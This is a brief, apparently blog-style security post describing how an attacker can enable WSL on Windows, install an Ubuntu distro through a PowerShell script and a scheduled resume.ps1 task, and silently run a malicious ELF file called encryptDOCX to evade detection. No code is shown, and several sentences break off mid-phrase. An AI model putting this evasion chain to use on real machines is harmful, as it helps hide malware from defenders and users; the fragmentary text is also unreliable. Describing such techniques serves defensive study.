Abusing WSL for Evasion1 minute read
WSL enables native Linux
ELF64 binaries to run on Windows via the
Windows Subsystem for Linux (WSL).
From attackers point of view, it’s promising, since
1809 (Windows 10 October 2018 Update) it’s possible to install
WSL distros from the Command Line.
It means that an attacker can enable
WSL and install a
Linux distro and execute malicious
ELF files in background.
C: drive is mounted on
Powershell script (
WSL and downloads
Ubuntu1804 package, also registers the task to execute the second script (
resume.ps1), which installs
Ubuntu distro and executes the
ELF file (
encryptDOCX), all of this happens without any interaction from a user, in background.
I think it’s much harder to detect/analyze malicous
ELF executable on